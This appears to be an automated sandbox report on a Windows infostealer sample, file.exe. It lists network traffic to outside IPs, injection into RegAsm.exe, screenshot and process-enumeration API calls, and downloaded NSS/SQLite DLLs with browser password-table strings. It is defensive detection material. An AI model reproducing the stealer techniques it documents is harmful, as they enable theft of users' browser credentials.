Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00411DF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_00411DF0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1C621	0_2_00A1C621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E4713	0_2_009E4713
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1CB72	0_2_00A1CB72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1ECA8	0_2_00A1ECA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009DCC44	0_2_009DCC44
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1D0C3	0_2_00A1D0C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009ED4F1	0_2_009ED4F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1D79F	0_2_00A1D79F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009FFBC6	0_2_009FFBC6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009DFBC0	0_2_009DFBC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E3CF3	0_2_009E3CF3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EBC73	0_2_009EBC73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D209	2_2_0041D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E387	2_2_0041E387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041D75A	2_2_0041D75A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041F890	2_2_0041F890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C34CF0	2_2_19C34CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CD5940	2_2_19CD5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C21C9E	2_2_19C21C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C22018	2_2_19C22018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D49A20	2_2_19D49A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D89CC0	2_2_19D89CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2292D	2_2_19C2292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C212A8	2_2_19C212A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C22AA9	2_2_19C22AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D45040	2_2_19D45040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C39000	2_2_19C39000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C23580	2_2_19C23580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CB53B0	2_2_19CB53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19DFD209	2_2_19DFD209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D89430	2_2_19D89430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CDD6D0	2_2_19CDD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CC9690	2_2_19CC9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C21EF1	2_2_19C21EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D24A60	2_2_19D24A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C48D2A	2_2_19C48D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CA8120	2_2_19CA8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CA0090	2_2_19CA0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D48030	2_2_19D48030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C23AB2	2_2_19C23AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D60480	2_2_19D60480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C48763	2_2_19C48763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C84760	2_2_19C84760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CB8760	2_2_19CB8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C48680	2_2_19C48680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2251D	2_2_19C2251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C4BAB0	2_2_19C4BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2290A	2_2_19C2290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2174E	2_2_19C2174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2F160	2_2_19C2F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C53370	2_2_19C53370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D069C0	2_2_19D069C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D1A940	2_2_19D1A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D3A900	2_2_19D3A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2481D	2_2_19C2481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C23E3B	2_2_19C23E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D5E800	2_2_19D5E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2EA80	2_2_19C2EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2AA40	2_2_19C2AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C219DD	2_2_19C219DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C82EE0	2_2_19C82EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C66E80	2_2_19C66E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19DFAEBE	2_2_19DFAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C2209F	2_2_19C2209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19CAA0B0	2_2_19CAA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19D1A590	2_2_19D1A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C4A560	2_2_19C4A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C247AF	2_2_19C247AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19C366C0	2_2_19C366C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 009D6FC0 appears 49 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C2395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C21F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C23AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19E006B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C2415B appears 132 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C21C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004022D0 appears 286 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .bsS ZLIB complexity 0.9967882980310262

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/21@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00410B00 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

2_2_00410B00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

2_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199677575543[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GDHDAEBGCAAFIDGCGDHI.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2056729974.0000000013ECB000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.2.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
